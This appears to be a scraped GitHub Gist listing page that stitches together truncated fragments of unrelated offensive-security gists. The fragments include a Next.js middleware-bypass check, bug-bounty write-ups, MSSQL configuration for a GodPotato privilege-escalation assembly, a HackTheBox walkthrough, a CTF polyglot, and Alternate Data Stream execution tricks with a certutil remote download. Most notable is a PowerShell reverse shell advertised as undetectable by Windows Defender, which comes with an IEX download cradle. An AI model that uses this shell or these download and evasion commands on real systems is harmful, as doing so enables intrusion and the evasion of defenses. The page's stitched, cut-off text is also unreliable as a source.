22sh sofianeelhor
@fourcube
fourcube / CVE-2025-29927.bcheck
Created March 24, 2025 07:55
Burp BCheck for CVE-2025-29927 (Next.js middleware bypass)
metadata:
language: v2-beta
name: "CVE-2025-29927 - Next.js middleware bypass"
description: "Checks for differences in responses when using different x-middleware-subrequest header paths"
author: "Chris Grieger - blueredix.com"
tags: "next.js", "middleware"
run for each:
middleware_value = "pages/_middleware",
"middleware",
@hackermondev
hackermondev / research.md
Last active May 5, 2025 03:30
Unique 0-click deanonymization attack targeting Signal, Discord and hundreds of platforms

hi, i'm daniel. i'm a 15-year-old high school junior. in my free time, i hack billion dollar companies and build cool stuff.

3 months ago, I discovered a unique 0-click deanonymization attack that allows an attacker to grab the location of any target within a 250 mile radius. With a vulnerable app installed on a target's phone (or as a background application on their laptop), an attacker can send a malicious payload and deanonymize you within seconds--and you wouldn't even know.

I'm publishing this writeup and research as a warning, especially for journalists, activists, and hackers, about this type of undetectable attack. Hundreds of applications are vulnerable, including some of the most popular apps in the world: Signal, Discord, Twitter/X, and others. Here's how it works:

Cloudflare

By the numbers, Cloudflare is easily the most popular CDN on the market. It beats out competitors such as Sucuri, Amazon CloudFront, Akamai, and Fastly. In 2019, a major Cloudflare outage k

@hackermondev
hackermondev / zendesk.md
Last active May 3, 2025 05:23
1 bug, $50,000+ in bounties, how Zendesk intentionally left a backdoor in hundreds of Fortune 500 companies

hi, i'm daniel. i'm a 15-year-old with some programming experience and i do a little bug hunting in my free time. here's the insane story of how I found a single bug that affected over half of all Fortune 500 companies:

say hello to zendesk

If you've spent some time online, you’ve probably come across Zendesk.

Zendesk is a customer service tool used by some of the world’s top companies. It’s easy to set up: you link it to your company’s support email (like [email protected]), and Zendesk starts managing incoming emails and creating tickets. You can handle these tickets yourself or have a support team do it for you. Zendesk is a billion-dollar company, trusted by big names like Cloudflare.

Personally, I’ve always found it surprising that these massive companies, worth billions, rely on third-party tools like Zendesk instead of building their own in-house ticketing systems.

your weakest link

import random
import argparse
import tempfile
import ipaddress
from time import sleep
from shlex import split
from os import path, remove
from scapy.all import sniff
from threading import Thread
from subprocess import Popen, PIPE
@m57
m57 / MSSQL_CLR_Custom_Assembly_GodPotato.sql
Created June 16, 2023 16:55
GodPotato as a MSSQL Custom CLR Assembly.
USE MSDB;
exec sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'clr strict security', 0;
RECONFIGURE;
exec sp_configure 'clr enabled', 1;
RECONFIGURE;
@mpgn
mpgn / Scrambled vs NetExec .md
Last active March 9, 2025 15:06
Scrambled vs NetExec for fun and profit by @mpgn_x64

Scrambled vs NetExec

Let's pwn the box Scrambled from HackTheBox using only NetExec! For context, I was reading the Scrambled writeup from 0xdf_ when I read this:

smbclient won’t work, and I wasn’t able to get crackmapexec to work either.

To be fair, at the time of his writeup it was true, but not anymore, and it's pretty simple with NXC: 5 minutes and you get root :)

Note: I will skip the web part, where we get one username: ksimpson

@guglia001
guglia001 / Undetectable_reverse_powershell_5-9-22.ps1
Created May 9, 2022 14:37
Powershell reverse shell script undetectable by windows defender
#based on original script by @nikhil_mitt. Change ip and port
#Undetectable on 05/09/2022
# Example IEX(New-Object Net.WebClient).downloadString('http://<ip>/<file>.ps1')
$KLK = New-Object System.Net.Sockets.TCPClient('<ip>','<port>');
$PLP = $KLK.GetStream();
[byte[]]$VVCCA = 0..((2-shl(3*5))-1)|%{0};
$VVCCA = ([text.encoding]::UTF8).GetBytes("Succesfuly connected .`n`n")
$PLP.Write($VVCCA,0,$VVCCA.Length)
$VVCCA = ([text.encoding]::UTF8).GetBytes((Get-Location).Path + ' > ')
@shinh
shinh / gen_el_lua_py2_jvm.rb
Last active December 26, 2020 18:15
bytecode polyglot - def con qual 2020 bytecoooding
#!/usr/bin/env ruby
# elisp, lua, python2, and jvm
# https://docs.google.com/spreadsheets/d/1l1N_wtK8xA7N-ezG5iUjDeg6iKQgVaYf8ckTSp30QIo/
$flag = File.read('flag').chomp
$ml_preamble = nil
$lua_preamble = nil
$ruby_preamble = nil
@api0cradle
api0cradle / Exe_ADS_Methods.md
Last active April 23, 2025 13:02
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab